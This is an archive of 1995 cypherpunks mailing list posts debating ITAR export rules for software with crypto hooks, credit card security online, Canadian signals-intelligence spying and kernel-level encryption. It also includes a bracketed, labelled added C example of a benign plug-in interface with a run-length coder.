Message-ID: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Tue, 14 Nov 1995, Jeff Barber wrote:

> s1113645@tesla.cc.uottawa.ca writes:
> 
> Does anyone know the ostensible justification for this?  What section of
> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

  I scanned through the ITAR, and I agree that there doesn't seem to be 
anything about hooks that are illegal, but the NSA does have the 
authority to protect whatever threatens national security.  If they are 
over-stepping their bounds who is going to push it to court to find out, 
as that is where the decision would have to be made (very expensive).
  Take care and have fun.

James Black





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 15 Nov 1995 05:29:36 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>
Message-ID: <199511142054.PAA07674@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:
>The interesting question is how narrow the interface has to be before it 
>becomes in violation of the ITAR. Is the key question whether the "holes" 
>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

If the ban *is* due to Category XIII (b) (5), the wording would
indicate that the "hole" must be "specifically designed or modified" to
support crypto.  One that was specifically designed to support some
sort of block compression library should be exempt under that
paragraph, even if someone else were to write and distribute a crypto
library with an identical interface.

'Course, IANAL, and the interpreters of the ITAR don't really seem to
care what it *says*, anyway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Wed, 15 Nov 1995 05:41:38 +0800
To: cypherpunks@toad.com
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <199511142111.NAA08624@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Do repeated words in a PGP passphrase make the pass phrase less secure than
a passphrase without any repeated words?  And on the same note, do repeated
letters in a UNIX password make that password easier to break? I can't seem
to find anything in my books on cryptography that mention this.  Thanks.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 15 Nov 1995 07:42:10 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511142110.NAA28546@email.pdcorp.com>
Message-ID: <199511142322.PAA24924@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I move we file a CJR on some suitable software with crypto hooks. Off
the top of my head, the most plausible candidate is NCSA httpd v1.3.
It's certainly software with function other than crypto. It's also the
case that the crypto hooks are nearly unusable. I should know - I got
quoted in USA Today for buying three CDs using these hooks ;-).

Another possibility that comes to mind is Eudora. A judgement that
Eudora is non-exportable is certain to piss a lot of people off. I'm
not sure whether that's a good thing or a bad thing. I promise not to
file a CJR without the express permission of the owners of the
software.

Such a CJR would certainly not be frivolous. It is certainly the case
that the law is not clear enough for software producers to move with
confidence. Further, applications with crypto hooks are much more
important to the cpunk cause than are the crypto applications
themselves. Face it: PGP is available to all, but very few people
actively use it. Its serious usability problems are only a small part
of the reason. The real reason is that people are unwilling to
integrate with it because they're afraid of the export controls.

By the way, I have not heard back regarding my t-shirt CJR. If I have
time, I'll call them tomorrow and ask what's up.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Wed, 15 Nov 1995 08:15:14 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk FAQ
Message-ID: <199511142338.PAA03302@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm new to the list, so please don't flame me too badly if this is a dumb question.  At least restrict the flames to private email where no one else can hear me scream.  :>

I downloaded the Cypherpunk FAQ from the Cypherpunk Website.  When I decompressed it, all it contained were the words "Yoo hoo, anybody home?"  Has the FAQ been corrupted or is this an in-joke?

Also, the Privacy FAQ states it was written by L. Detweiler.  Is this THE L. Detweiler?  If so, why is it in the archives?

Thanks for helping me out.

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 15 Nov 1995 05:19:35 +0800
To: James Black <black@sunflash.eng.usf.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142050.PAA05867@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



James Black writes:
>   I scanned through the ITAR, and I agree that there doesn't seem to be 
> anything about hooks that are illegal, but the NSA does have the 
> authority to protect whatever threatens national security.

Since when? They aren't a police agency. They have no power to arrest
or prosecute, and they don't even (directly) make any decisions on any
of this stuff (although they are responsible for the decisions that
are made).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Wed, 15 Nov 1995 05:23:02 +0800
To: cypherpunks@toad.com
Subject: world smartcards..
In-Reply-To: <9510200413.AA17440@sulphur.osf.org>
Message-ID: <AkeE5Ve00WBMQ8F_Qw@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know what kind of encryption they will be using...


------------------------------------------------------------------
HP builds security for smartcard shopping
=========================================
Hewlett-Packard is bidding for US government approval for a
worldwide cryptographic framework, which is being to provide a
security for a joint smartcard project with Gemplus and
Informix.

The three companies plan to develop a secure personal
information card system, with which businesses can deliver
services including Internet-based transactions to consumers.
The encrypted cards will carry several thousand times the
amount of data on current smartcards and will (pending US
export approvals) be usable anywhere in the world.

HP is providing server, encryption, middleware and networking
technologies. Gemplus will provide advanced smart-card
technology. Database and middleware technologies will come from
Informix. The alliance was launched at Telecom 95.

HP's proposed non-user-accessible cryptography is the first
element in an international open cryptography framework, with
which it hopes to deliver security technology compliant with
US export regulations.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 08:11:07 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFUJh-00091rC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner <sjb@universe.digex.net> writes:

>Jeff Barber writes:
>>Does anyone know the ostensible justification for this?  What section of
>>the ITARs do they point to when they say "this is illegal"?  I've perused
>>an online copy of ITAR (no, I haven't read all of it -- I have other
>>things I want to do this year :-), but I can't find a section that could
>>be construed to support this contention.
>
>I think it's 121.1, Category XIII paragraph (b) item (5):
>"Ancillary equipment specifically designed or modified for paragraphs (b)
>(1), (2), (3), (4) and (5) of this category;"

Question:  What makes computers in general NOT describable by such a
paragraph?!?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 15 Nov 1995 05:46:08 +0800
To: Kevin L Prigge <klp@gold.tc.umn.edu>
Subject: Re: Good Enough?
In-Reply-To: <30a8f8836ed1002@noc.cis.umn.edu>
Message-ID: <199511142124.QAA23598@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

First, I must warn you that generating keys on behalf of users is in
general a very bad thing to do.  Instead, you might want to provide a
simple way for users to generate keys and get them certified.  The
biggest problem is that there is not an easy way to get a good set of
random numbers on a server platform.  On the other hand, users can get
a great deal of randomness on their own client machines.  If they can
run netscape, then they can run PGP.

Second, you might want to look at a paper that Jeff Schiller and I
wrote for the 1995 Usenix conference on scaling the web of trust.
The paper is available off my home page or via ftp:
	toxicwaste.mit.edu:/pub/pgpsign/scaleweb.{txt,PS}

The sources to the keysigner are also in the same directory.

Hope this helps.

-derek

       Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory
       Member, MIT Student Information Processing Board (SIPB)
    Home page: http://www.mit.edu:8001/people/warlord/home_page.html
       warlord@MIT.EDU    PP-ASEL     N1NWH    PGP key available




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 06:13:13 +0800
To: cypherpunks@toad.com
Subject: CSE gets flak on TV
Message-ID: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


For those who care, the Communications Security Establishment has been
getting some flak for spying on Mex. during NAFTA talks and on Korea to
help us sell Can. nuke reactors:
(This rather mirrors the trouble their sister agency, the NSA, has been 
getting into)
(sorry the online newscasts were rather vague)
     _________________________________________________________________ 
   
                        CP LOGO CANADIAN NEWS DIGEST 
                                       
   
   Tuesday, Nov. 14
   
   
   
   
   Electronic snooping part of the game
   
   
   OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
   high-tech spy agency snoops on friendly countries for financial gain. 
   
   Increasingly, intelligence agencies around the world are using their
   antennas, computers and codebreakers to gather economic information,
   Wesley Wark, a University of Toronto history professor, said Monday.
   
   Some of Canada's largest trading partners--including the United
   States, France and Japan--comb the airwaves for useful information, so
   Canada would be foolish not to join the game, said Wark. 
   
   Canada's secretive Communications Security Establishment--an arm of
   the Defence Department--collects and analyses communications traffic
   on the activities of foreign states, corporations and people.
   
   Jane Shorten, a former CSE employee, told CTV News in an interview
   Sunday the agency spied on Canada's allies and trading
   partners--including Mexico and South Korea--by eavesdropping on
   embassies, consulates and diplomats.
   
   ___


                                 HEADLINE NEWS
                                       
All times are Eastern Standard Time

Date: Tue-14-Nov-1995, Time: 13:00

   
   mexico and south korea are angry about reports that canada spied on
   them. the mexican government has filed a diplomatic note expressing
   its surprise and concern, and south korea has launched an inquiry. a
   former intelligence agent, jane shorten, says she spied on both
   countries, as well as japan, when she was with the communications
   security establishment. she says the c-s-e shifted its focus after the
   cold war from spying on the russians to spying on allies to get trade
   secrets. prime minister chretien says the organization is supposed to
   operate within the law. chretien says the c-s-e doesn't report to him
   on a daily basis, so he doesn't know if it was spying on anyone. 
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 06:49:32 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511142220.AA13813@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

Everything is decided on a case-by-case basis.  I was in a meeting
with some NSA export-control people (Dept Z03) and asked a few questions
on this topic trying to nail down the angle of this slippery slope.

Basically, generic buffer-manipulation is okay.  "Keyed compression"
where you explicitly passed something called a key to a DLL routine
would be looked on suspiciously.  An abstract set of open/modify/close
routines (where open returned a pointer to opaque state, say a session
key :) would be fine.  The technical guy quickly grasped that I was
talking about anonymous remailers, but they "conceded" there's nothing
they can do about it.

I say "concede" because that implies more political/control-issues
than were really present at the meeting.
	/r$
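
[Added example, not part of the original message or of any software named in this thread: a C sketch of the open/modify/close interface shape described above, where the host holds only an opaque state pointer and a parameter blob it never interprets. All names (`xform_ops`, `host_transform`, the run-length plug-in) are hypothetical.]

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical plug-in contract. The host never looks inside the state
 * returned by open() or inside the params blob it hands over. */
typedef struct xform_ops {
    const char *name;
    void *(*open)(const void *params, size_t params_len);
    long  (*modify)(void *state, const unsigned char *in, size_t in_len,
                    unsigned char *out, size_t out_cap);
    void  (*close)(void *state);
} xform_ops;

/* ---- plug-in side: a run-length coder, (count, byte) pairs ---- */
struct rle_state {
    int decode;             /* 0 = compress, 1 = expand */
    unsigned char max_run;  /* longest run emitted as one pair */
};

static void *rle_open(const void *params, size_t params_len)
{
    /* params: byte 0 is the mode ('c' or 'd'), optional byte 1 a run limit */
    const unsigned char *p = params;
    struct rle_state *st;

    if (p == NULL || params_len < 1 || (p[0] != 'c' && p[0] != 'd'))
        return NULL;
    st = malloc(sizeof *st);
    if (st == NULL)
        return NULL;
    st->decode = (p[0] == 'd');
    st->max_run = (params_len > 1 && p[1] != 0) ? p[1] : 255;
    return st;
}

static long rle_modify(void *state, const unsigned char *in, size_t in_len,
                       unsigned char *out, size_t out_cap)
{
    const struct rle_state *st = state;
    size_t i = 0, o = 0;

    if (st == NULL)
        return -1;
    if (st->decode) {
        if (in_len % 2 != 0)
            return -1;                      /* truncated pair */
        for (; i < in_len; i += 2) {
            size_t run = in[i];
            if (run == 0 || run > out_cap - o)
                return -1;                  /* bad count or output full */
            memset(out + o, in[i + 1], run);
            o += run;
        }
    } else {
        while (i < in_len) {
            size_t run = 1;
            while (i + run < in_len && in[i + run] == in[i] &&
                   run < st->max_run)
                run++;
            if (out_cap - o < 2)
                return -1;                  /* output full */
            out[o++] = (unsigned char)run;
            out[o++] = in[i];
            i += run;
        }
    }
    return (long)o;
}

static void rle_close(void *state)
{
    free(state);
}

const xform_ops rle_plugin = { "rle", rle_open, rle_modify, rle_close };

/* ---- host side: identical for every plug-in with this interface ---- */
long host_transform(const xform_ops *ops,
                    const void *params, size_t params_len,
                    const unsigned char *in, size_t in_len,
                    unsigned char *out, size_t out_cap)
{
    void *h;
    long n;

    if (ops == NULL || !ops->open || !ops->modify || !ops->close)
        return -1;
    h = ops->open(params, params_len);      /* opaque handle */
    if (h == NULL)
        return -1;
    n = ops->modify(h, in, in_len, out, out_cap);
    ops->close(h);
    return n;                               /* bytes written, or -1 */
}

int main(void)
{
    /* constructed sample input */
    const unsigned char msg[] = "aaabccdddd";
    unsigned char packed[32], plain[32];
    long n = host_transform(&rle_plugin, "c", 1, msg, 10, packed, sizeof packed);
    long m = host_transform(&rle_plugin, "d", 1, packed, (size_t)n,
                            plain, sizeof plain);

    printf("%s: %ld bytes packed, %ld bytes restored\n", rle_plugin.name, n, m);
    return (m == 10 && memcmp(plain, msg, 10) == 0) ? 0 : 1;
}
```

[Nothing in `host_transform` or `xform_ops` names the kind of transform being loaded; that is the property the thread is arguing about.]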




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 06:51:26 +0800
To: cypherpunks@toad.com
Subject: CSE gets flak on TV
Message-ID: <199511142220.RAA05223@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by s1113645@tesla.cc.uottawa.ca () on Tue, 14 
Nov  4:47 PM

>For those who care, the Communications Security 
>Establishment has been  getting some flak for spying on 
>Mex. during NAFTA talks and on Korea to  help us sell 
>Can. nuke reactors:


Here's a facet of the burgeoning counterspying, oops, biz-intel 
blathering, oops, globally competing, oops, leveling the 
playing field, oops, securing the econo-nation, oops, 
downsizing spies and X-spies and XX-ing spies and putting to 
pasture cud-chomping nincompoops of the Chomsky-contra-CIA 
golden-asses era:

---------

   The Wall Street Journal, November 14, 1995, p. A15.


   This Is the CEO -- Get Me the CIA [Op-Ed, excerpts]

   By Ernest Brod. (Mr. Brod is executive managing director of
   Kroll Associates, an international investigation, business
   intelligence and security firm based in New York.)


   While government policy makers ponder and debate [economic
   espionage] issues, U.S. companies are fighting the global
   competitiveness battle. In the past year U.S. companies
   have rushed to level the playing field with foreign
   competitors who have long exploited the advantage of
   competitor intelligence. For years, foreign-based
   multinationals have had teams of people devoted to learning
   as much as they could about their U.S. competitors. The
   methods ranged from in-depth research and analysis of
   publicly available information to covert and sometimes
   clumsy attempts at industrial espionage, in some cases with
   the active support of their government's intelligence
   agencies.

   Today, having had their consciousness raised by the global
   business realities of the '90s, U.S. companies in all
   industries are scrambling to set up units devoted to
   gathering strategic information about the competition.
   Teams can be found at both corporate and division levels;
   they may be multi-department or reside within planning,
   development, marketing, finance or international units.
   They may have euphemistic labels and they increasingly draw
   upon burgeoning numbers of outside private resources.

   In recent months, for example, my firm was asked to help
   determine:

   + Whether an Asian competitor will take advantage of the
   North American Free Trade Agreement to establish facilities
   in Mexico in order to supply the U.S. market.

   + How an overseas competitor with an apparently comparable
   cost base can consistently produce lower bids.

   + Who controls an overseas private company and how deep are
   their pockets.

   While the controversy continues over whether U.S. companies
   should be favored with government-sponsored industrial
   intelligence, managers are already employing legal and
   ethical research and investigative techniques to learn more
   about the methods, resources and plans of their marketplace
   adversaries.

   These forays may not be exciting, risky or glamorous enough
   for our battle-hardened spy masters, but they help American
   strategists win hard-fought ground from their adversaries.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 15 Nov 1995 18:12:14 +0800
To: cypherpunks@toad.com
Subject: credit card conventional wisdom
Message-ID: <199511150156.RAA18623@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been seeing a particular meme-nugget of conventional wisdom
circulating in reference to credit cards that I'd like to debunk.
(recently showed up in the WSJ, "Boardwatch" magazine editorial
column, etc). these legends and thinkings are starting to annoy
me to the point of becoming a pet peeve.

the argument goes like this: secure credit card number uploading
schemes (such as in Netscape) are not important on the internet because 
credit card numbers are already insecure. you give them to low-wage
workers all the time who might steal the number from you anyway.

there are a lot of fallacies with this. I find this to be a key
cypherpunk issue, and I hope others will agree to the point of
trying to attack this fallacy through letters to the editor,
debates, etc., because it seems to rationalize weak security.

- 1st point: yes, you do give credit cards to low wage workers
in businesses, but this is not directly parallel to sending a
credit card over the internet. the fuzzy thinking goes like
this: "credit card numbers are already not secure. therefore, trying to
secure them is frivolous". this is patently ridiculous on the
face of it. it's circular reasoning. credit card numbers could
become more secure if all businesses made them more secure.
getting all businesses to make them secure is part of the battle.
raising consciousness on the issue is part of the battle. saying,
"there is no point" is a copout imho.

- the insecurity of sending a card over the net could be far better
or worse than that of handing it to an individual. 1st, when you
send a number over the net, potentially anyone (including people other
than the destination business) could spy on it. 
when you give it to someone in a company, only that representative
(who would be trusted by the company)
has access to it. or, alternately, maybe no one could *ever* see
your card sent over the internet, including workers at the end
site, who never deal with the numbers directly. such a system
is possible and may become the norm. but not if shallow-thinking 
people can't imagine it as possible.

- it is not impossible to have cards that don't have numbers but
instead have magnetic stripes, and the only way for them to work
is to be physically scanned. this would reduce fraud but would also
reduce the convenience of sending numbers over the phone (mail
order) for example. I'm not saying all cards should be this way,
but it might make sense for some people to get a "scan only card"
that cannot be used unless physically scanned. the point is that
there are variations on the credit card theme that make them more
secure, and there's a bit of a hurdle in getting Joe Sixpack to
realize this, and realize it's desirable.

- the boardwatch magazine editor argued that uploading credit card numbers
over the internet in a secure fashion is a "non problem" because
credit cards are already insecure. have you ever heard of PROGRESS,
mr. bonehead? if the net began to make credit transactions more
secure, perhaps that would create a momentum in which other offline
businesses might become more strict or careful about credit card
security.

- credit card fraud is absolutely enormous in this country. and there
are not really any very strong safeguards against it except a 
lot of "security through obscurity" (of credit card numbers). *everyone*
pays the cost of this horrible fraud rate through increased
transaction charges, higher interest rates, etc.  just because you
may not see it itemized on your credit card bill, does not mean you
are not paying for it. (in much the same way that a sort of
"shoplifting tax" is reflected in the cost of all merchandise).

- the internet may eventually become completely secure. arguing that
"we don't need security on the internet because we don't have it in
the business world of daily credit card use, and they get along fine"
is ridiculously simplistic and specious. the fact is that businesses
do *not* really like many aspects of credit cards: low security,
overhead costs, cost of interface devices to the credit card companies,
etc.  all these negative ingredients could be improved in cyberspace.
but it won't happen if every time a new superior system comes along,
someone argues, "but there's nothing wrong with what we have now!!!"
when this is quite obviously mistaken to anyone with any minimal 
background & understanding in the area. furthermore, consumers are
somewhat notorious for not really knowing what they want, and sometimes
arguing against something they would buy or use in the future.

==

I'm continually amazed at how often security issues are mixed up
in people's brains and reasoning. there are a lot of fallacies that
work their way into respectable writing by reputable people
that tend to mirror circular
reasoning such as, "if something is insecure already, it makes no
point to try to make a piece of it more secure".  security is sometimes won
slowly in increments, in which one could argue against each increment
as useless or inconsequential, but the end result could lead to 
far better security. furthermore, there are a lot of different kinds
of security weaknesses-- there is not a simple black-and-white 
measurement of "secure" vs. "insecure" but a lot of intermediate
gradations.

attempts to get secure credit card number transfer on the internet
are not an end in themselves. they are the first steps toward an 
entirely new transaction system. those who see a single step and
criticize it as feeble in the context of past systems
are missing the point and apparently can't think past the present 
nanosecond of their lives.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 07:36:19 +0800
To: cypherpunks@toad.com
Subject: world smartcards..
Message-ID: <199511142317.SAA11549@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by msew+@andrew.cmu.edu (Martin C Sweitzer) 
on Tue, 14 Nov  3:51 PM

>Anyone know what kind of encryption they will be 
>using...


HP's web site at <http://www.hp.com> has more info on the cards 
and the related "international cryptographic platform" being 
crippled and begged and groveled to USG for export.


Try the site's search feature for "encryption" to poke around 
HP's various products, where some of the crypto to be employed 
is cited, if hypocryptically.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 15 Nov 1995 08:10:34 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>
Message-ID: <199511142342.SAA03627@homeport.org>
MIME-Version: 1.0
Content-Type: text


| Sounds cool, but...
| 
| I already have PGP on my Macs. Why would I want this?

Much easier to use.  Faster than PGP on a mac.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 08:32:55 +0800
To: cypherpunks@toad.com
Subject: Get your own ITAR
Message-ID: <9511150016.AA14450@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


    1 703 875 6644.
The kindly administrative assistant there will take your name and address
and send you a hardcopy of the ITAR regulations.  I don't know about
overseas mailings.  I also imagine you will have to wait until the current
US budget stale-mate is resolved.  (Thanks to digest-reader walt@osf.org
for the phone number.)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Wed, 15 Nov 1995 11:39:29 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511150321.AA17449@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Detweiler writes:

> the argument goes like this: secure credit card number uploading
> schemes (such as in Netscape) are not important on the internet because 
> credit card numbers are already insecure. you give them to low-wage
> workers all the time who might steal the number from you anyway.

> there are a lot of fallacies with this. I find this to be a key
> cypherpunk issue, and I hope others will agree to the point of
> trying to attack this fallacy through letters to the editor,
> debates, etc., because it seems to rationalize weak security.

You're only reproducing half of the debate, which goes like this:

Businesses/customers won't trust the Internet for commerce, because it's
not perfectly secure.

And then others go on to point out that businesses and consumers do business
every day using commerce tools whose security features are weak to nonexistent.

So, no, we don't have to "get the Internet ready for business" because it's
already at least as secure as ordinary consumer transactions. This doesn't
mean that it's not important to work on security, just that it's a useful
direction for improvement, not a baseline requirement.

Most consumer-level transactions are based on a general sort of 
trust-in-human-nature sort of policy, backed up by the knowledge that a single
failed transaction (or even a constant low level of failed transactions, where
failed == "didn't get paid but gave the stuff away") isn't likely to kill off
a business or even make it unprofitable. Loss by theft or fraud can be thought
of like any other sort of overhead - and it doesn't make sense (financially)
to spend more to eliminate it than you'll recover by that elimination. 
Pursuing criminal or civil charges against a non-performing party is 
expensive - most people do it out of a sense of moral outrage, or because they
want to maintain a public perception of unforgiveness, not because they 
really think they'll get back what they've expended in time, money, and 
opportunities lost for other (more profitable) pursuits. (see Axelrod on
the Prisoner's Dilemma tournaments for the arguable game-theory C-punks
cryptoanarchy relevance.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKlcz33YhjZY3fMNAQEAlwP7B+cP/IB1wZ0TeWwwoL5j9z4m5irIO9yV
O5599i6fiJ2X3+HbJKGY0/aENs1Zq6kNPHo1I/HcjBhN3fazwelv5BV1dFfmnfUp
lPA8DOTraM7qGse6JEpG+tyJa7bL4wadjDAlFVe4uPSxokw1gppBMkZa6pcwd3cX
zQ7ammmgeQI=
=ZZi9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 15 Nov 1995 10:41:03 +0800
To: cypherpunks@toad.com
Subject: encryption in BeOS kernel
Message-ID: <199511150222.TAA15162@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Some of you may be aware of this interesting new computer named the
"BeBox" which will start shipping in Q1 96 I think.
 Go here for more info. 


A paragraph on the Q&A page caught my attention and when they asked
for expert advice I naturally thought of you guys.


"Q: What security protection will the BeBox have?

 A: We're planning to offer a security/encryption mechanism at the
 kernel level. However, we haven't nailed down the details of this
 mechanism, so your expert input would be appreciated. One of our
 primary interests is to allow encryption of application software for
 individual machines. (The flash ROM in each BeBox will be serialized
 in the portion of the ROM which is unmodifiable.)"


I have two things to add:

1.  The scheme they mention there is, I think, intended to be a 
software protection scheme and like all such is doomed to failure.  
I hope they don't spend too much effort on it.  On the other hand
there might be some nifty crypto applications that could use this
unique identifier.  Although none come to mind...


2.  Be, Inc. is located in Menlo Park, CA, USA and Paris, France.  
They couldn't have picked two countries who are more likely to 
royally screw them by restricting the export/sale of their product 
once said product has encryption built-in.  (Of course they could 
put the encryption in a loadable kernel module, which would be an 
interesting test of ITAR's "crypto-with-a-hole" restrictions.)


I hope the NSA isn't reading this and getting ideas...


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKlOufWZSllhfG25AQFQWwP/TQ6MM3xmoZ6bel/mTsLhX/TpEOn5YWMc
F6IsTUfpLbCMHGUmIoF09qFJNaB2zvPhy8gzx9eZxU1EoPYBCi76q/pNWGiyw0Xa
21iRjC62pq/v8oroQCPpLgU27btd8EBlz7/q46tzWD1Jphb5IjTQ1L0PxqQB6H5t
EBhbsR8h9iA=
=9bYq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 12:55:09 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Rich Salz wrote:

> >There is in fact a distinction between "card present" and "card not present"
> >transactions. AMEX cards for example have an extra group of four digits which 
> >are not part of the embossed card number. They are used as additional 
> >verification to prove that a card is present.
> 
> So the run-it-through-the-mechanical-device is treated as card not present?

No. What Phil is saying is that the magnetic strip contains an extra 
group of digits which are only available when the stripe is read, and not 
when the card is used for CNP. 

I can't confirm or deny this, as despite my new bosses, I still find it 
hard to care about credit card readers (mostly because US banks won't 
let me have any). 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 13:02:32 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Random Thoughts (was Re: BBS Generator Code)
In-Reply-To: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951114204508.18220B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Re: Blum-Blum-Shub.

Isn't the best reason to use BBS the fact that it's just so 
much fun to say- it sounds like something out of Lovecraft.
Blum Blum Shub Niguath, the Black Code of the woods with a thousand bits. 

MD5 and LFSRs are just plain dull.

Simon // All I wanna do is make a Blum-Blum-Shub with a zoom-zoom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 Nov 1995 13:15:57 +0800
To: cypherpunks@toad.com
Subject: Re: encryption in BeOS kernel
Message-ID: <acceb284000210049f9b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Either John Young or someone imitating his style wrote:

>Would chip-fabbers covertly Fortezza chips to get export ok?
>

I have no idea what "Fortezza" means as a verb, but I'll Moscow a guess:
Intel might, according to this guesser, insert NSA-approved back doors in
"information appliance" chips.

Unlikely in the extreme, for a variety of reasons. First, designers cannot
keep secrets. Second, examination of the chips would reveal such meddling.
Third, Intel is only one of several likely providers of such chips (e.g.,
Oracle is said to have plans to use Acorn ARM chips, and DEC may also
provide low-end Alpha chips, and of course Motorola-IBM has variants of the
PPC to provide).

>Motorola, HP, IBM, others long-linked to USG are ever ready
>to gobble international market share in the national
>interest.
>
>Intel, sure, world-class fab plants planting chip-secrets.
>
>Wonder if that key escrow protest to Gore is a cover for
>economic actions authorized by National Security D&D?

Too much Pynchon?

--Tim May

